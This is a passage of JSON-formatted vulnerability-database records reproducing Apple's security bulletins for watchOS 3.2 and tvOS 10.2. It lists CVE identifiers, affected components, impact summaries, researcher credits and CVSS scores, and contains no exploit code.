This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform 
Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input 
validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: 
Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**libarchive**\n\nAvailable for: All Apple Watch models\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. 
This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: All Apple Watch models\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: All Apple Watch models\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-04T03:34:42", "title": "About the security content of watchOS 3.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2461", "CVE-2017-2450", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2379", "CVE-2017-2428", "CVE-2017-2471", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2451", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2458", "CVE-2017-2401", "CVE-2017-2467", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2416", "CVE-2017-2440", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-04-04T03:34:42", "id": "APPLE:HT207602", "href": "https://support.apple.com/kb/HT207602", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-01T00:00:00", "description": "# About the security content of tvOS 10.2\n\nThis document describes the security content of tvOS 10.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, 
Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. 
These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A 
memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. 
This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: natashenka of Google Project Zero, Jeonghoon Shin\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through 
improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. 
This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of tvOS 10.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", 
"CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-27T00:00:00", "id": "APPLE:C3300089BE0D932332C0D20113B0C302", "href": "https://support.apple.com/kb/HT207601", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:40", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, 
Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV 